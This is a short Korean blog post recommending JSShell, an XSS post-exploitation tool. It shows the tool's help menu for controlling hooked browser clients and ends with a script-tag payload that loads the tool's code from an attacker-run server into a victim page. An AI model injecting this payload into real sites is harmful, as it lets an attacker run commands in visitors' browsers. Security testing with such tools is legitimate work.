git 보다가 재미있는 툴 있어 공유드립니다.
JSSHELL이라 툴로 XSS Post Exploit 툴 정도로 보심 되고 요약하면 beef의 Command line 버전이라고 생각하시면 좋을 것 같습니다.

https://github.com/Den1al/JSShell

     ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬  
     ║╚═╗└─┐├─┤├┤ │  │  
    ╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0     
        by @Daniel_Abeles
    
>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit                Edit a file in a text editor
help                List available commands or provide detailed help for a specific command
history             View, run, edit, save, or clear previously entered commands
ipy                 Enter an interactive IPython shell
py                  Invoke Python command or shell
quit                Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back                Un-select the current selected client
clients             List and control the clients that have registered to our system
commands            Show the executed commands on the selected client
dump                Dumps a command to the disk
execute             Execute commands on the selected client
select              Select a client as the current client

>>

분석 과정에서 쓸일은 거의 없지만 추가적인 영향력 테스트나 장난감으로 가지고 놀기 좋아보여요. 다른 XSS Post Exploit 툴과 비슷하게 서버 실행하고 아래 path(/content/js)를 삽입해서 나머지 처리 로직을 불러올 수 있습니다.
<script src="http://192.168.0.14/content/js"></script>

댓글 없음:

댓글 쓰기